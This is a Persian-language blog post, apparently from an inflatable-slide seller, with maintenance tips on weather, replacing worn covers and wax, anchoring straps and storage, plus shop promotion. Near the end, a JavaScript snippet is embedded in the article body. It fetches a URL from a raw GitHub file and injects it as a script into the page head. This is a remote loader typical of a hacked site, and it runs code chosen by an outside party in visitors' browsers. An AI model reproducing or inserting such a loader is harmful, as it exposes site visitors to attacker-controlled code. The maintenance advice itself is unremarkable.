نگهداری سرسره بادی

نگهداری سرسره بادی

  • خرید سرسره بادی تنها بخشی از ماجراست! پس از خرید باید به فکر آن باشید که نحوه نگهداری سرسره بادی چگونه است. خرابی، پوسیدگی، پارگی و کاهش طول عمر از مواردی است که اگر از قصر بادی خود درست نگهداری نکنید اتفاق می افتد.

    نکات نگهداری سرسره بادی

    پس از مدتی که از خرید سرسره بادی می گذرد شما نیازمند نگهداری بهینه از آن جهت بالابردن کارکرد و افزایش طول عمر هستید.

    در صورتی که هنزو سرسره بادی خود را خریداری نکرده اید میتوانید به صفحه فروشگاه ما مراجعه کنید. همچنین در صورتی که از خرید خود اطمینان کافی ندارید میتوانید پست خرید سرسره بادی را مشاهده کنید.

    1. نکات نگهداری سرسره بادی – دوری از شرایط بد آب و هوایی

    بدون شک محصولات بادی سازان مجد با بالاترین کیفیت پارچه ساخته شده و در برابر رطوبت و گرما مقاوم هستند. نکته قابل توجه اینجاست که هر چند کم اما به مرور زمان آب و هوا در هر گونه محصول بادی تاثیر خود را میگذارد. همچنین بهتر است تا حد ممکنه تجهیزات الکترونیکی مانند دمنده هوا را در محیط خشک و تمیز نگهداری کنید.

    2. تعویض و تجهیز لوازم جانبی

    یکی از نکات مهم برای نگهداری سرسره بادی تعویض لوازم جانبی آن است. لوازمی مانند روکش سر در اثر سایش مداوم ممکن است پس از چندین سال پوسیده شوند. شایسته است جهت جلوگیری از حوادث جانبی در اسراع وقت آن را تعویض و یا تعمیر نمایید.

    همچنین روکش سر برای کارایی بهتر نیازمند واکس (روغن سرسره بادی) می باشد. واکس سر میبایست کیفیت بالا و به خصوصی داشته باشد تا به پارچه و مشتریان شما آسیبی وارد نشود. همچنین شما می توانید واکس سر مورد نیاز خود را از طریق فروشگاه همین سایت تهیه نمایید.

    جهت نگهداری سرسره بادی خود، استفاده از طناب و بند مهار به شما کمک میکند تا استفاده بهتری از قصر بادی خود داشته باشید. برای مثال در صورت وجود باد شدید و آب و هوای نا مسائد بند مهار می تواند از جا به جایی سرسره بادی شما جلوگیری کند. استفاده از بند مهار یکی از واجبات سرسره بادی می باشد.

    در عین حال شما نیاز به استفاده از زیر انداز، رو انداز، کاور و روکش جهت مراقبت از سرسره بادی خود دارید. در صورتی که قصد خرید هر کدام از موارد ذکر شده را دارید می توانید با بخش فروش ما تماس بگیرید.( تلفن: 09127484573)

    3. زمان غیر قابل استفاده

    یکی از نکات مهم نگهداری سرسره بادی بسته بندی آن است. اگر قصر بادی یا سرسره بادی شما برای مدتی قابل استفاده نیست، شما حتما نیازمند بسته بندی و جا به جایی آن به انبار خود هستید. گرد و خاک، رطوبت، گرما و سرما می تواند از عمر قصر بادی شما بکاهد.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۳ رای

    دیدگاهتان را بنویسید